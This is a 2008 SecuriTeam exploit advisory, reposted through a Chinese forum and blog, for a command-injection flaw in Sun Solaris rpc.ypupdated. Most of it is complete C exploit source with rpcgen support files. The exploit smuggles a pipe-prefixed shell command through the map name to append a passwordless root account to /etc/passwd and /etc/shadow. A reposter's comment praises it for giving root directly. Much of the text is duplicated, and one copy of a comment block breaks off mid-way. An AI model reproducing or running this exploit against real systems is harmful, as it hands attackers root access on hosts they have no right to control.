以下消息来自幻影论坛[Ph4nt0m]邮件组。
发件人: SecuriTeam [mailto:supp
...@securiteam.com]
发送时间: 2008年3月20日 13:55
收件人: html-l ...@securiteam.com
主题: [EXPL] Sun Solaris rpc.ypupdated Arbitrary Command Execution (Exploit)
发送时间: 2008年3月20日 13:55
收件人: html-l ...@securiteam.com
主题: [EXPL] Sun Solaris rpc.ypupdated Arbitrary Command Execution (Exploit)
【豆豆心得】据测试这个漏洞很猛,溢出后直接得到root,而且这么严重的漏洞在9以后很少见了。。。
The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: [url]http://www.securiteam.com/[/url]
can be found at the SecuriTeam web site: [url]http://www.securiteam.com/[/url]
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
[url]http://www.securiteam.com/mailinglist.html[/url]
[url]http://www.securiteam.com/mailinglist.html[/url]
- - - - - - - - -
Sun Solaris rpc.ypupdated Arbitrary Command Execution (Exploit)
Insufficient filtering done on user provided input by the rpc.ypupdated RPC
process under the Sun Solaris operating system allows remote attackers to
cause the process to execute arbitrary commands.
process under the Sun Solaris operating system allows remote attackers to
cause the process to execute arbitrary commands.
Vulnerable Systems:
* Sun Solaris 10
* Sun Solaris 10
Exploit:
ypk.c:
ypk.c:
/*update: kcope/year2008/tested on SunOS 5.10//
KEYSERV/YPUPDATED (SunOS 4.1.3/RPC SERVICES)
If we send an MAP UPDATE to a remote YPUPDATED (via KEYSERV)
it executes a shell through which extra commands may be launched
on the remote host by passing '|shell command'.
i.e. the COMM variable contains a pipe character after which a
command may be passed. You may change the command by changing this.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <rpc/rpc.h>
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255
typedef struct{
unsigned int yp_buf_len;
char * yp_buf_val;
} yp_buf;
struct ypupdate_args{
char * mapname;
yp_buf key;
yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#else
bool_t xdr_ypupdate_args();
#endif
void main(argc, argv)
int argc;
char *argv[];
{
CLIENT * cli;
unsigned long prog=100028;
unsigned int vers=1;
struct sockaddr_in skn;
struct timeval timeVal;
struct hostent * hostEnt;
ypupdate_args ypArg;
unsigned long rtnval;
unsigned int desc;
char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >>
/etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;";
if(argc<2) {
printf("example: yxp target\n");
exit(1);
}
timeVal.tv_usec=0;
timeVal.tv_sec=15;
desc=RPC_ANYSOCK;
ypArg.datum.yp_buf_val="x";
ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1;
ypArg.key.yp_buf_val="x";
ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1;
ypArg.mapname=comm;
if ((hostEnt=gethostbyname(argv[1]))==NULL){
printf("gethostbyname failure\n");
exit(1);
}
skn.sin_family=AF_INET;skn.sin_port=htons(0);
bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4);
if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){
printf("clntudp_create failure\n");
exit(1);
}
cli->cl_auth=authunix_create("localhost",0,0,0,0);
clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal);
}
ypupdate_prot.h:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/
#ifndef _YPUPDATE_PROT_H_RPCGEN
#define _YPUPDATE_PROT_H_RPCGEN
#include <rpc/rpc.h>
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255
typedef struct {
u_int yp_buf_len;
char *yp_buf_val;
} yp_buf;
#ifdef __cplusplus
extern "C" bool_t xdr_yp_buf(XDR *, yp_buf*);
#elif __STDC__
extern bool_t xdr_yp_buf(XDR *, yp_buf*);
#else /* Old Style C */
bool_t xdr_yp_buf();
#endif /* Old Style C */
struct ypupdate_args {
char *mapname;
yp_buf key;
yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#else /* Old Style C */
bool_t xdr_ypupdate_args();
#endif /* Old Style C */
struct ypdelete_args {
char *mapname;
yp_buf key;
};
typedef struct ypdelete_args ypdelete_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#elif __STDC__
extern bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#else /* Old Style C */
bool_t xdr_ypdelete_args();
#endif /* Old Style C */
#define YPU_PROG ((u_long)100028)
#define YPU_VERS ((u_long)1)
#ifdef __cplusplus
#define YPU_CHANGE ((u_long)1)
extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#elif __STDC__
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#else /* Old Style C */
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1();
extern u_int * ypu_change_1_svc();
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1();
extern u_int * ypu_insert_1_svc();
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1();
extern u_int * ypu_delete_1_svc();
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1();
extern u_int * ypu_store_1_svc();
#endif /* Old Style C */
#endif /* !_YPUPDATE_PROT_H_RPCGEN */
ypupdate_prot_xdr.c:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/
#include "ypupdate_prot.h"
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/
bool_t
xdr_yp_buf(XDR *xdrs, yp_buf *objp)
{
register long *buf;
if (!xdr_bytes(xdrs, (char **)&objp->yp_buf_val, (u_int
*)&objp->yp_buf_len, MAXYPDATALEN)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp)
{
register long *buf;
if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->key)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->datum)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp)
{
register long *buf;
if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->key)) {
return (FALSE);
}
return (TRUE);
}
KEYSERV/YPUPDATED (SunOS 4.1.3/RPC SERVICES)
If we send an MAP UPDATE to a remote YPUPDATED (via KEYSERV)
it executes a shell through which extra commands may be launched
on the remote host by passing '|shell command'.
i.e. the COMM variable contains a pipe character after which a
command may be passed. You may change the command by changing this.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <rpc/rpc.h>
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255
typedef struct{
unsigned int yp_buf_len;
char * yp_buf_val;
} yp_buf;
struct ypupdate_args{
char * mapname;
yp_buf key;
yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#else
bool_t xdr_ypupdate_args();
#endif
void main(argc, argv)
int argc;
char *argv[];
{
CLIENT * cli;
unsigned long prog=100028;
unsigned int vers=1;
struct sockaddr_in skn;
struct timeval timeVal;
struct hostent * hostEnt;
ypupdate_args ypArg;
unsigned long rtnval;
unsigned int desc;
char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >>
/etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;";
if(argc<2) {
printf("example: yxp target\n");
exit(1);
}
timeVal.tv_usec=0;
timeVal.tv_sec=15;
desc=RPC_ANYSOCK;
ypArg.datum.yp_buf_val="x";
ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1;
ypArg.key.yp_buf_val="x";
ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1;
ypArg.mapname=comm;
if ((hostEnt=gethostbyname(argv[1]))==NULL){
printf("gethostbyname failure\n");
exit(1);
}
skn.sin_family=AF_INET;skn.sin_port=htons(0);
bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4);
if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){
printf("clntudp_create failure\n");
exit(1);
}
cli->cl_auth=authunix_create("localhost",0,0,0,0);
clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal);
}
ypupdate_prot.h:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/
#ifndef _YPUPDATE_PROT_H_RPCGEN
#define _YPUPDATE_PROT_H_RPCGEN
#include <rpc/rpc.h>
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255
typedef struct {
u_int yp_buf_len;
char *yp_buf_val;
} yp_buf;
#ifdef __cplusplus
extern "C" bool_t xdr_yp_buf(XDR *, yp_buf*);
#elif __STDC__
extern bool_t xdr_yp_buf(XDR *, yp_buf*);
#else /* Old Style C */
bool_t xdr_yp_buf();
#endif /* Old Style C */
struct ypupdate_args {
char *mapname;
yp_buf key;
yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#else /* Old Style C */
bool_t xdr_ypupdate_args();
#endif /* Old Style C */
struct ypdelete_args {
char *mapname;
yp_buf key;
};
typedef struct ypdelete_args ypdelete_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#elif __STDC__
extern bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#else /* Old Style C */
bool_t xdr_ypdelete_args();
#endif /* Old Style C */
#define YPU_PROG ((u_long)100028)
#define YPU_VERS ((u_long)1)
#ifdef __cplusplus
#define YPU_CHANGE ((u_long)1)
extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#elif __STDC__
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);
#else /* Old Style C */
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1();
extern u_int * ypu_change_1_svc();
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1();
extern u_int * ypu_insert_1_svc();
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1();
extern u_int * ypu_delete_1_svc();
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1();
extern u_int * ypu_store_1_svc();
#endif /* Old Style C */
#endif /* !_YPUPDATE_PROT_H_RPCGEN */
ypupdate_prot_xdr.c:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/
#include "ypupdate_prot.h"
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/
bool_t
xdr_yp_buf(XDR *xdrs, yp_buf *objp)
{
register long *buf;
if (!xdr_bytes(xdrs, (char **)&objp->yp_buf_val, (u_int
*)&objp->yp_buf_len, MAXYPDATALEN)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp)
{
register long *buf;
if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->key)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->datum)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp)
{
register long *buf;
if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->key)) {
return (FALSE);
}
return (TRUE);
}
Additional Information:
The information has been provided by kcope <mailto:kingc ...@gmx.net> .
The original article can be found at: [url]http://www.milw0rm.com/exploits/5282[/url]
The information has been provided by kcope <mailto:kingc ...@gmx.net> .
The original article can be found at: [url]http://www.milw0rm.com/exploits/5282[/url]
============================================================================
====
====
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body
to: html-list-unsubscr ...@securiteam.com
In order to subscribe to the mailing list and receive advisories in HTML
format, simply forward this email to: html-list-subscr ...@securiteam.com
To unsubscribe from the list, send mail with an empty subject line and body
to: html-list-unsubscr ...@securiteam.com
In order to subscribe to the mailing list and receive advisories in HTML
format, simply forward this email to: html-list-subscr ...@securiteam.com
============================================================================
====
============================================================================
====
====
============================================================================
====
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
转载于:https://blog.51cto.com/netwalk/67020
227
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
